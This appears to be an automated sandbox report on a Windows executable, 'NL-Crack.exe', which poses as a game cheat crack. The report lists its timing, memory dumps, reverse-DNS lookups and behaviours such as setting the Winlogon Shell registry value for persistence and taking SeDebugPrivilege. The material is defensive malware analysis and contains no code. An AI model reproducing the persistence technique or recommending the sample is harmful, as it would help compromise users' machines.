memory/2868-83-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-84-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

memory/2868-85-0x00007FFCCA6B0000-0x00007FFCCB171000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-06 21:36

Reported

2024-10-06 21:39

Platform

win10v2004-20240802-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe

"C:\Users\Admin\AppData\Local\Temp\NeverLoseCrack-main\NL-Crack.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp

Files

memory/3916-0-0x00007FF92DA03000-0x00007FF92DA05000-memory.dmp

memory/3916-1-0x0000028D33570000-0x0000028D33592000-memory.dmp

memory/3916-2-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-5-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-6-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-7-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-70-0x00007FF92DA03000-0x00007FF92DA05000-memory.dmp

memory/3916-71-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-72-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp

memory/3916-73-0x00007FF92DA00000-0x00007FF92E4C1000-memory.dmp